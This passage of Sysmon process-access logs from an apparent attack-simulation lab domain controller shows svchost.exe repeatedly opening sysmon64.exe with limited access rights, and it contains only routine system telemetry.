07:53:24.358","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1498,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.358\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.358","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1499,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.358\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.358","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1500,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.358\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.358","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1501,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.358\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.358","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1502,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.358\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.358","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1503,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.358\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.358","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1504,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.358\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.358","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1505,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.358\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 